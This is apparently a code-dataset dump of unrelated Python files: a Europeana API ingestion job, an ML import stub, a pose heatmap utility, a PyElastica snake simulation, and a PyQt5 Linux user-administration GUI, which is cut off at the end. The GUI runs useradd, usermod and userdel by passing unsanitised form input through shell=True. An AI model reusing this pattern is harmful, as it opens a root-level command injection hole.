id (stringlengths 1–8) | text (stringlengths 6–1.05M) | dataset_id (stringclasses, 1 value)
---|---|---|
3396468
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import inspect
import logging
import os
import pandas as pd
import requests
from vdk.api.job_input import IJobInput
log = logging.getLogger(__name__)
def run(job_input: IJobInput):
"""
Download datasets required by the scenario and put them in the data lake.
"""
log.info(f"Starting job step {__name__}")
api_key = job_input.get_property("api_key")
start = 1
rows = 100
basic_url = f"https://api.europeana.eu/record/v2/search.json?wskey={api_key}&query=who:%22Vincent%20Van%20Gogh%22"
url = f"{basic_url}&rows={rows}&start={start}"
response = requests.get(url)
response.raise_for_status()
payload = response.json()
n_items = int(payload["totalResults"])
while start < n_items:
if start > n_items - rows:
rows = n_items - start + 1
url = f"{basic_url}&rows={rows}&start={start}"
response = requests.get(url)
response.raise_for_status()
payload = response.json()["items"]
df = pd.DataFrame(payload)
job_input.send_tabular_data_for_ingestion(
df.itertuples(index=False),
destination_table="assets",
column_names=df.columns.tolist(),
)
start = start + rows
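# Note: the loop above pages through the Europeana Search API using `start`/`rows`
# (start = 1, 101, 201, ...) and shrinks `rows` on the last page so the final request
# does not overshoot totalResults.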
# df = pd.read_csv(url, dtype=dtypes).replace("'", "''", regex=True)
# df.columns = df.columns.str.replace(" ", "")
# job_input.send_tabular_data_for_ingestion(
# df.itertuples(index=False),
# destination_table="life_expectancy_2010_2015",
# column_names=df.columns.tolist(),
# )
|
StarcoderdataPython
|
3254592
|
"""Sk-learn module."""
from deployml.sklearn.models.decision_tree import DecisionTree
from deployml.sklearn.models.logistic_regression import LogisticRegressionBase
from deployml.sklearn.models.neural_network import NeuralNetworkBase
|
StarcoderdataPython
|
3496632
|
<filename>VA/main/utils/heatmaps.py<gh_stars>100-1000
import numpy as np
from .math import normalpdf2d
from .pose import get_visible_joints
class HeatMaps2D():
def __init__(self, poses, numbins, variance=0.3):
assert (poses.shape[-1] == 2) or ((poses.shape[-1] == 3)), \
'Poses are expected to be 2D or 3D!'
self.poses = poses
if len(poses.shape) == 4:
self.num_frames = poses.shape[1]
else:
self.num_frames = None
self.numbins = numbins
self.variance = variance
self.num_joints = int(poses.shape[-2])
def __getitem__(self, key):
p = self.poses[key]
if isinstance(key, int):
return pose_heatmaps(p, self.numbins, self.num_joints,
variance=self.variance, num_frames=self.num_frames)
if isinstance(key, slice):
indices = key.indices(len(self))
key = range(*indices)
x = np.zeros((len(key),) + self.shape[1:])
for i in range(len(key)):
x[i,:] = pose_heatmaps(p[i], self.numbins, self.num_joints,
variance=self.variance, num_frames=self.num_frames)
return x
def __len__(self):
return len(self.poses)
@property
def shape(self):
if self.num_frames is None:
return (len(self),) + (self.numbins, self.numbins, self.num_joints)
else:
return (len(self),) + (self.num_frames,
self.numbins, self.numbins, self.num_joints)
def pose_heatmaps(p, num_bins, num_joints, variance=0.1, num_frames=None):
if num_frames is None:
h = np.zeros((num_bins, num_bins, num_joints))
v = get_visible_joints(p[:, 0:2])
points = num_bins * p[:, 0:2]
for j in range(num_joints):
if v[j]:
h[:,:,j] = normalpdf2d(num_bins,
points[j,0], points[j,1], variance)
else:
h = np.zeros((num_frames, num_bins, num_bins, num_joints))
for f in range(num_frames):
v = get_visible_joints(p[f][:, 0:2])
points = num_bins * p[f][:, 0:2]
for j in range(num_joints):
if v[j]:
h[f,:,:,j] = normalpdf2d(num_bins,
points[j,0], points[j,1], variance)
return h
|
StarcoderdataPython
|
12823434
|
__doc__ = """Muscular snake example from <NAME>. al. Nature Comm 2019 paper."""
import sys
from collections import defaultdict  # used for the post-processing dictionaries below
import numpy as np
sys.path.append("../../")
from elastica import *
from examples.MuscularSnake.post_processing import (
plot_video_with_surface,
plot_snake_velocity,
)
from examples.MuscularSnake.muscle_forces import MuscleForces
from elastica.experimental.connection_contact_joint.parallel_connection import (
SurfaceJointSideBySide,
get_connection_vector_straight_straight_rod,
)
# Set base simulator class
class MuscularSnakeSimulator(
BaseSystemCollection, Constraints, Connections, Forcing, CallBacks
):
pass
muscular_snake_simulator = MuscularSnakeSimulator()
# Simulation parameters
final_time = 16.0
time_step = 5e-6
total_steps = int(final_time / time_step)
rendering_fps = 30
step_skip = int(1.0 / (rendering_fps * time_step))
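# With the values above: total_steps = int(16.0 / 5e-6) = 3,200,000 simulation steps, and
# step_skip = int(1.0 / (30 * 5e-6)) = 6666, i.e. diagnostics are recorded every ~6666 steps,
# matching roughly 30 frames per second of simulated time.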
rod_list = []
# Snake body
n_elem_body = 100
density_body = 1000
base_length_body = 1.0
base_radius_body = 0.025
E = 1e7
nu = 4e-3
shear_modulus = E / 2 * (0.5 + 1.0)
poisson_ratio = 0.5
direction = np.array([1.0, 0.0, 0.0])
normal = np.array([0.0, 0.0, 1.0])
start = np.array([0.0, 0.0, base_radius_body])
snake_body = CosseratRod.straight_rod(
n_elem_body,
start,
direction,
normal,
base_length_body,
base_radius_body,
density_body,
nu,
youngs_modulus=E,
shear_modulus=shear_modulus,
)
body_elem_length = snake_body.rest_lengths[0]
# Define muscle fibers
n_muscle_fibers = 8
# Muscle force amplitudes
muscle_force_amplitudes = (
np.array([22.96, 22.96, 20.95, 20.95, 9.51, 9.51, 13.7, 13.7])[::-1] / 2
)
# Set connection index of first node of each muscle with body
muscle_start_connection_index = [4, 4, 33, 33, 23, 23, 61, 61]
muscle_end_connection_index = []
muscle_glue_connection_index = (
[]
) # These are the middle node idx of muscles that are glued to body
muscle_rod_list = []
"""
The muscle density is higher than the physiological one, since
we lump many muscles (SSP-SP, LD and IC) into one actuator. These rods
also represent the two tendons on the sides of the muscle which biologically
have a higher density than the muscle itself. For these reasons, we set the
muscle density to approximately twice the biological value.
"""
density_muscle = 2000
E_muscle = 1e4
nu_muscle = nu
shear_modulus_muscle = E_muscle / 2 * (0.5 + 1.0)
# Muscle group 1 and 3, define two antagonistic muscle pairs
n_elem_muscle_group_one_to_three = 13 * 3
base_length_muscle = 0.39
"""
In our simulation, we lump many biological tendons into one computational
tendon. As a result, our computational tendon is bigger in size, set as elements other than 4-8
below.
"""
muscle_radius = np.zeros((n_elem_muscle_group_one_to_three))
muscle_radius[:] = 0.003 # First set tendon radius for whole rod.
muscle_radius[4 * 3 : 9 * 3] = 0.006 # Change the radius of muscle elements
for i in range(int(n_muscle_fibers / 2)):
index = muscle_start_connection_index[i]
# Choose which side of the body we are attaching the muscles to. Note that these muscles are antagonistic pairs.
# So they are at the opposite sides of the body and side_sign determines that.
side_sign = -1 if i % 2 == 0 else 1
start_muscle = np.array(
[
index * body_elem_length,
side_sign * (base_radius_body + 0.003),
base_radius_body,
]
)
muscle_rod = CosseratRod.straight_rod(
n_elem_muscle_group_one_to_three,
start_muscle,
direction,
normal,
base_length_muscle,
muscle_radius,
density_muscle,
nu_muscle,
youngs_modulus=E_muscle,
shear_modulus=shear_modulus_muscle,
)
"""
The biological tendons have a high Young's modulus E, but are very slender.
As a result, they resist extension (stretch) but can bend easily.
Due to our decision to lump tendons and in order to mimic the above behavior
of the biological tendons, we use a lower Young's
Modulus and harden the stiffness of the shear and stretch modes only.
Numerically, this is done by putting a pre-factor of 50000 before the
shear/stretch matrix below. The actual value of the prefactor does not matter,
what is important is that it is a high value that yields a high stretch/shear stiffness.
"""
muscle_rod.shear_matrix[..., : 4 * 3] *= 50000
muscle_rod.shear_matrix[..., 9 * 3 :] *= 50000
muscle_rod_list.append(muscle_rod)
muscle_end_connection_index.append(index + n_elem_muscle_group_one_to_three)
muscle_glue_connection_index.append(
np.hstack(
(
np.arange(0, 4 * 3, 1, dtype=np.int64),
np.arange(9 * 3, n_elem_muscle_group_one_to_three, 1, dtype=np.int64),
)
)
)
# Muscle group 2 and 4, define two antagonistic muscle pairs
n_elem_muscle_group_two_to_four = 33
base_length_muscle = 0.33
"""
In our simulation, we lump many biological tendons into one computational
tendon. As a result, our computational tendon is bigger in size, set as rm_t
below.
"""
muscle_radius = np.zeros((n_elem_muscle_group_two_to_four))
muscle_radius[:] = 0.003 # First set tendon radius for whole rod.
muscle_radius[4 * 3 : 9 * 3] = 0.006 # Change the radius of muscle elements
for i in range(int(n_muscle_fibers / 2), n_muscle_fibers):
index = muscle_start_connection_index[i]
# Choose which side of the body we are attaching the muscles to. Note that these muscles are antagonistic pairs.
# So they are at the opposite sides of the body and side_sign determines that.
side_sign = -1 if i % 2 == 0 else 1
start_muscle = np.array(
[
index * body_elem_length,
side_sign * (base_radius_body + 0.003),
base_radius_body,
]
)
muscle_rod = CosseratRod.straight_rod(
n_elem_muscle_group_two_to_four,
start_muscle,
direction,
normal,
base_length_muscle,
muscle_radius,
density_muscle,
nu_muscle,
youngs_modulus=E_muscle,
shear_modulus=shear_modulus_muscle,
)
"""
The biological tendons have a high Young's modulus E, but are very slender.
As a result, they resist extension (stretch) but can bend easily.
Due to our decision to lump tendons and in order to mimic the above behavior
of the biological tendons, we use a lower Young's
Modulus and harden the stiffness of the shear and stretch modes only.
Numerically, this is done by putting a pre-factor of 50000 before the
shear/stretch matrix below. The actual value of the prefactor does not matter,
what is important is that it is a high value that yields a high stretch/shear stiffness.
"""
muscle_rod.shear_matrix[..., : 4 * 3] *= 50000
muscle_rod.shear_matrix[..., 9 * 3 :] *= 50000
muscle_rod_list.append(muscle_rod)
muscle_end_connection_index.append(index + n_elem_muscle_group_two_to_four)
muscle_glue_connection_index.append(
# np.array([0,1, 2, 3, 9, 10 ], dtype=np.int)
np.hstack(
(
np.arange(0, 4 * 3, 1, dtype=np.int64),
np.arange(9 * 3, n_elem_muscle_group_two_to_four, 1, dtype=np.int64),
)
)
)
# After initializing the rods append them on to the simulation
rod_list.append(snake_body)
rod_list = rod_list + muscle_rod_list
for _, my_rod in enumerate(rod_list):
muscular_snake_simulator.append(my_rod)
# Muscle actuation
post_processing_forces_dict_list = []
for i in range(n_muscle_fibers):
post_processing_forces_dict_list.append(defaultdict(list))
muscle_rod = muscle_rod_list[i]
side_of_body = 1 if i % 2 == 0 else -1
time_delay = muscle_start_connection_index[::-1][i] * 1.0 / 101.76
muscular_snake_simulator.add_forcing_to(muscle_rod).using(
MuscleForces,
amplitude=muscle_force_amplitudes[i],
wave_number=2.0 * np.pi / 1.0,
arm_length=(base_radius_body + 0.003),
time_delay=time_delay,
side_of_body=side_of_body,
muscle_start_end_index=np.array([4 * 3, 9 * 3], np.int64),
step=step_skip,
post_processing=post_processing_forces_dict_list[i],
)
straight_straight_rod_connection_list = []
straight_straight_rod_connection_post_processing_dict = defaultdict(list)
for idx, rod_two in enumerate(muscle_rod_list):
rod_one = snake_body
(
rod_one_direction_vec_in_material_frame,
rod_two_direction_vec_in_material_frame,
offset_btw_rods,
) = get_connection_vector_straight_straight_rod(
rod_one,
rod_two,
(muscle_start_connection_index[idx], muscle_end_connection_index[idx]),
(0, rod_two.n_elems),
)
straight_straight_rod_connection_list.append(
[
rod_one,
rod_two,
rod_one_direction_vec_in_material_frame.copy(),
rod_two_direction_vec_in_material_frame.copy(),
offset_btw_rods.copy(),
]
)
for k in range(rod_two.n_elems):
rod_one_index = k + muscle_start_connection_index[idx]
rod_two_index = k
k_conn = (
rod_one.radius[rod_one_index]
* rod_two.radius[rod_two_index]
/ (rod_one.radius[rod_one_index] + rod_two.radius[rod_two_index])
* body_elem_length
* E
/ (rod_one.radius[rod_one_index] + rod_two.radius[rod_two_index])
)
if k < 12 or k >= 27:
scale = 1 * 2
scale_contact = 20
else:
scale = 0.01 * 5
scale_contact = 20
muscular_snake_simulator.connect(
first_rod=rod_one,
second_rod=rod_two,
first_connect_idx=rod_one_index,
second_connect_idx=rod_two_index,
).using(
SurfaceJointSideBySide,
k=k_conn * scale,
nu=1e-4,
k_repulsive=k_conn * scale_contact,
rod_one_direction_vec_in_material_frame=rod_one_direction_vec_in_material_frame[
..., k
],
rod_two_direction_vec_in_material_frame=rod_two_direction_vec_in_material_frame[
..., k
],
offset_btw_rods=offset_btw_rods[k],
post_processing_dict=straight_straight_rod_connection_post_processing_dict,
step_skip=step_skip,
)
# Friction forces
# Only apply to the snake body.
gravitational_acc = -9.81
muscular_snake_simulator.add_forcing_to(snake_body).using(
GravityForces, acc_gravity=np.array([0.0, 0.0, gravitational_acc])
)
origin_plane = np.array([0.0, 0.0, 0.0])
normal_plane = normal
slip_velocity_tol = 1e-8
froude = 0.1
period = 1.0
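# The friction coefficient below follows from the Froude number definition used here,
# Fr = L / (T^2 * |g| * mu), rearranged to mu = L / (T^2 * |g| * Fr).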
mu = base_length_body / (period * period * np.abs(gravitational_acc) * froude)
kinetic_mu_array = np.array(
[1.0 * mu, 1.5 * mu, 2.0 * mu]
) # [forward, backward, sideways]
static_mu_array = 2 * kinetic_mu_array
muscular_snake_simulator.add_forcing_to(snake_body).using(
AnisotropicFrictionalPlane,
k=1e1,
nu=40,
plane_origin=origin_plane,
plane_normal=normal_plane,
slip_velocity_tol=slip_velocity_tol,
static_mu_array=static_mu_array,
kinetic_mu_array=kinetic_mu_array,
)
class MuscularSnakeCallBack(CallBackBaseClass):
def __init__(self, step_skip: int, callback_params: dict):
CallBackBaseClass.__init__(self)
self.every = step_skip
self.callback_params = callback_params
def make_callback(self, system, time, current_step: int):
if current_step % self.every == 0:
self.callback_params["time"].append(time)
self.callback_params["step"].append(current_step)
self.callback_params["position"].append(system.position_collection.copy())
self.callback_params["com"].append(system.compute_position_center_of_mass())
self.callback_params["radius"].append(system.radius.copy())
self.callback_params["velocity"].append(system.velocity_collection.copy())
self.callback_params["avg_velocity"].append(
system.compute_velocity_center_of_mass()
)
self.callback_params["center_of_mass"].append(
system.compute_position_center_of_mass()
)
post_processing_dict_list = []
for idx, rod in enumerate(rod_list):
post_processing_dict_list.append(defaultdict(list))
muscular_snake_simulator.collect_diagnostics(rod).using(
MuscularSnakeCallBack,
step_skip=step_skip,
callback_params=post_processing_dict_list[idx],
)
muscular_snake_simulator.finalize()
timestepper = PositionVerlet()
integrate(timestepper, muscular_snake_simulator, final_time, total_steps)
plot_video_with_surface(
post_processing_dict_list,
video_name="muscular_snake.mp4",
fps=rendering_fps,
step=1,
# The following parameters are optional
x_limits=(-0.1, 1.0), # Set bounds on x-axis
y_limits=(-0.3, 0.3), # Set bounds on y-axis
z_limits=(-0.3, 0.3), # Set bounds on z-axis
dpi=100, # Set the quality of the image
vis3D=True, # Turn on 3D visualization
vis2D=True, # Turn on projected (2D) visualization
)
plot_snake_velocity(
post_processing_dict_list[0], period=period, filename="muscular_snake_velocity.png"
)
|
StarcoderdataPython
|
86376
|
<reponame>flyflyinit/GUI-admin-tool
from PyQt5.QtCore import Qt
try:
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QProgressBar, QPushButton, QSpinBox, QLabel, QLineEdit, \
QFormLayout, \
QHBoxLayout, QListWidget, QMessageBox, QCheckBox
except ImportError as e:
print(
f'package PyQt5 Not Found\n{e}\ntry :\npip3 install --user pyqt5\nOR\ndnf install python3-pyqt5, yum install python3-pyqt5\n')
try:
import subprocess
import concurrent.futures
from datetime import datetime
except ImportError as e:
print(f'package not found\n{e}\n')
class CreateUsersWindow(QWidget):
def __init__(self):
super().__init__()
self.setGeometry(200, 50, 300, 400)
self.setWindowTitle("Add Users")
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.cancelAction)
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px solid #27ae60")
self.okBtn.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.submitBtn.setHidden(False)
self.cancelBtn.setHidden(False)
self.okBtn.setFixedHeight(30)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px solid #27ae60")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px solid #e74c3c")
self.bottomLayout.addWidget(self.okBtn)
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addWidget(self.progeesBar)
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.usersNbr = QSpinBox(self)
self.usersNbr.setMinimum(1)
self.usersNbr.setMaximum(1000)
self.usersNbr.setSuffix(" user")
self.createHomeDir = QCheckBox('Create Home Directory')
self.form = QFormLayout()
self.editLineUsername = QLineEdit('')
self.editLineUsername.setPlaceholderText('enter username')
self.form.addRow(QLabel('Username :'), self.editLineUsername)
self.editLineUserShell = QLineEdit('')
self.editLineUserShell.setPlaceholderText('enter shell')
self.form.addRow(QLabel('User Shell :'), self.editLineUserShell)
self.editLineUserComment = QLineEdit('')
self.editLineUserComment.setPlaceholderText('enter comment')
self.form.addRow(QLabel('Comment :'), self.editLineUserComment)
self.note = QLabel('')
self.topLayout.addWidget(self.usersNbr)
self.topLayout.addWidget(self.editLineUsername)
self.topLayout.addWidget(self.editLineUserShell)
self.topLayout.addWidget(self.editLineUserComment)
self.topLayout.addWidget(self.createHomeDir)
self.topLayout.addWidget(self.note)
def submitAction(self):
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(self.usersNbr.value())
self.progeesBar.setValue(0)
usersList = self.generateList()
txt = ''
nbr = 0
with concurrent.futures.ThreadPoolExecutor() as executor:
results = executor.map(self.createuserThreading, usersList)
for result in results:
nbr += 1
self.progeesBar.setValue(nbr)
txt = txt + result + "\n"
self.note.setText(txt)
self.setCursor(Qt.ArrowCursor)
self.okBtn.setHidden(False)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
def generateList(self):
usersList = []
homeDir = 'False'
if self.createHomeDir.isChecked():
homeDir = 'True'
if int(self.usersNbr.value()) == 1:
usersList.append(
[self.editLineUsername.text(), self.editLineUserComment.text(), self.editLineUserShell.text(), homeDir])
else:
for user in range(self.usersNbr.value()):
usersList.append(
[self.editLineUsername.text() + str(user + 1), self.editLineUserComment.text() + str(user + 1),
self.editLineUserShell.text(), homeDir])
return usersList
def createuserThreading(self, user):
if user[3] == 'True':
homedir = '-m'
else:
homedir = ''
try:
c = f'useradd {homedir} -s {user[2]} -c "{user[1]}" {user[0]}'
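# Illustrative example of the command built above (all values hypothetical):
#   useradd -m -s /bin/bash -c "comment 1" user1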
subprocess.run(c, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, check=True)
except subprocess.CalledProcessError:
return f"error occurred while creating {user[0]}"
else:
return f"{user[0]} has been created successfully!"
def cancelAction(self):
self.close()
class EditUsersWindow(QWidget):
def __init__(self, userDetails):
super().__init__()
self.setGeometry(200, 50, 500, 500)
self.setWindowTitle("Edit User")
self.userDetails = userDetails
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.middleLayout = QHBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.text = QLabel('')
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setHidden(True)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.okBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px")
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.bottomLayout.addWidget(self.okBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.form = QFormLayout()
print(self.userDetails)
self.username = QLineEdit(self.userDetails[0])
self.form.addRow(QLabel('Username :'), self.username)
self.id = QLineEdit(self.userDetails[1])
self.form.addRow(QLabel('User ID :'), self.id)
self.primaryGroup = self.userDetails[2].split('(')[1].split(')')[0]
self.priGroup = QLineEdit(self.primaryGroup)
self.form.addRow(QLabel('Primary Group :'), self.priGroup)
self.comment = QLineEdit(self.userDetails[4])
self.form.addRow(QLabel('Comment :'), self.comment)
self.homeDir = QLineEdit(self.userDetails[5])
self.form.addRow(QLabel('Home Directory :'), self.homeDir)
self.shell = QLineEdit(self.userDetails[6])
self.form.addRow(QLabel('Shell :'), self.shell)
if self.userDetails[7] == 'never':
self.expirationDate = QLineEdit()
else:
import dateutil.parser as parser
self.expirationDate_adapted = datetime.strptime(self.userDetails[7], '%b %d, %Y').strftime('%Y-%m-%d')
date = parser.parse(self.expirationDate_adapted)
self.expirationDate = QLineEdit(date.isoformat().split('T')[0])
self.form.addRow(QLabel('Expiration Date :'), self.expirationDate)
self.groupsBtns = QVBoxLayout()
self.lineEditAddGroup = QLineEdit()
self.lineEditAddGroup.setPlaceholderText('enter group name')
self.addGroupBtn = QPushButton('Add')
self.addGroupBtn.clicked.connect(self.addGroup)
self.deleteGroupBtn = QPushButton('Delete')
self.deleteGroupBtn.clicked.connect(self.deleteGroup)
self.deleteAllGroupsBtn = QPushButton('Delete All')
self.deleteAllGroupsBtn.clicked.connect(self.deleteAllGroups)
self.groupsBtns.addWidget(self.lineEditAddGroup)
self.groupsBtns.addWidget(self.addGroupBtn)
self.groupsBtns.addWidget(self.deleteGroupBtn)
self.groupsBtns.addWidget(self.deleteAllGroupsBtn)
self.groupsBtns.addStretch()
self.listGroups = QListWidget()
self.form.addRow(QLabel('Groups :'), self.middleLayout)
groups = self.userDetails[3].split(',')
for group in groups:
grp = group.split('(')[1].split(')')[0]
if grp == self.primaryGroup:
continue
else:
self.listGroups.addItem(grp)
self.middleLayout.addWidget(self.listGroups)
self.middleLayout.addLayout(self.groupsBtns)
self.topLayout.addLayout(self.form)
self.topLayout.addWidget(self.text)
self.topLayout.addWidget(self.progeesBar)
def addGroup(self):
group = self.lineEditAddGroup.text()
if group == "":
pass
else:
self.listGroups.addItem(group)
def deleteGroup(self):
listGroups = self.listGroups.selectedItems()
if not listGroups: return
for group in listGroups:
self.listGroups.takeItem(self.listGroups.row(group))
def deleteAllGroups(self):
self.listGroups.clear()
def submitAction(self):
try:
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(1)
self.progeesBar.setValue(0)
self.edituser()
except subprocess.CalledProcessError:
QMessageBox.warning(self, 'warning', f"error occured during editing this user\n")
else:
self.setCursor(Qt.ArrowCursor)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
self.okBtn.setHidden(False)
def okAction(self):
self.close()
def edituser(self):
usernamee = self.username.text()
idd = self.id.text()
priGroupp = self.priGroup.text()
commentt = self.comment.text()
homeDirr = self.homeDir.text()
shelll = self.shell.text()
expirationDatee = self.expirationDate.text()
txt = ''
groupsitems = []
for index in range(self.listGroups.count()):
groupsitems.append(str(self.listGroups.item(index).text()))
groupsitemsstring = ",".join(groupsitems)
print(groupsitemsstring)
if expirationDatee == "never":
QMessageBox.warning(self, 'expiration field error', "expiration field can't be 'never' ")
return 0
elif expirationDatee == '':
pass
else:
try:
subprocess.run(f'usermod -e {expirationDatee} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing expiration date for this user\n"
self.text.setText(txt)
else:
txt = txt + "expiration date edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -g {priGroupp} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing primary group for this user\n"
self.text.setText(txt)
else:
txt = txt + "primary group edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -G {groupsitemsstring} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing supplementary groups for this user\n"
self.text.setText(txt)
else:
txt = txt + "supplementary groups edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -s {shelll} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing shell for this user\n"
self.text.setText(txt)
else:
txt = txt + "shell edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -d {homeDirr} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing home directory for this user\n"
self.text.setText(txt)
else:
txt = txt + "home directory edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f"usermod -c '{commentt}' {self.userDetails[0]}", stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing comment for this user\n"
self.text.setText(txt)
else:
txt = txt + "comment edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f"usermod -u {idd} {self.userDetails[0]}", stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing user id for this user\n"
self.text.setText(txt)
else:
txt = txt + "user id edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -l {usernamee} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing username for this user\n"
self.text.setText(txt)
else:
txt = txt + "username edited succesfully\n"
self.text.setText(txt)
self.progeesBar.setValue(1)
def cancelAction(self):
self.close()
class DeleteUsersWindow(QWidget):
def __init__(self, d):
super().__init__()
self.setGeometry(200, 50, 300, 300)
self.setWindowTitle("Delete Users")
self.listUsersToDelete = d
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setHidden(True)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.okBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px")
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.bottomLayout.addWidget(self.okBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.a = ', '.join(self.listUsersToDelete)
self.text = QLabel(f'Are You Sure You want To Delete The Following Users :\n\n{self.a}')
self.text2 = QLabel()
self.topLayout.addWidget(self.text)
self.topLayout.addWidget(self.text2)
self.topLayout.addWidget(self.progeesBar)
def submitAction(self):
try:
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(len(self.listUsersToDelete))
self.progeesBar.setValue(0)
self.deleteuser()
except subprocess.CalledProcessError:
QMessageBox.warning(self, 'warning', f"error occured during setting this hostname\n")
else:
self.setCursor(Qt.ArrowCursor)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
self.okBtn.setHidden(False)
def okAction(self):
self.close()
def deleteuserThreading(self, username):
try:
subprocess.run(f'userdel -r {username}', stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True,
shell=True)
except subprocess.CalledProcessError:
return f"error occurred while deleting {username}"
else:
return f"{username} deleted successfully!"
def deleteuser(self):
with concurrent.futures.ThreadPoolExecutor() as executor:
results = executor.map(self.deleteuserThreading, self.listUsersToDelete)
i = 0
r = ''
for result in results:
i = i + 1
r = r + "\n" + result
self.progeesBar.setValue(i)
self.text2.setText(r)
def cancelAction(self):
self.close()
class MoreUsersWindow(QWidget):
def __init__(self, text, username):
super().__init__()
self.setGeometry(200, 50, 300, 300)
self.setWindowTitle(username)
self.text = text
self.layouts()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.label = QLabel(self.text)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setFixedHeight(30)
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.topLayout.addWidget(self.label)
self.bottomLayout.addWidget(self.okBtn)
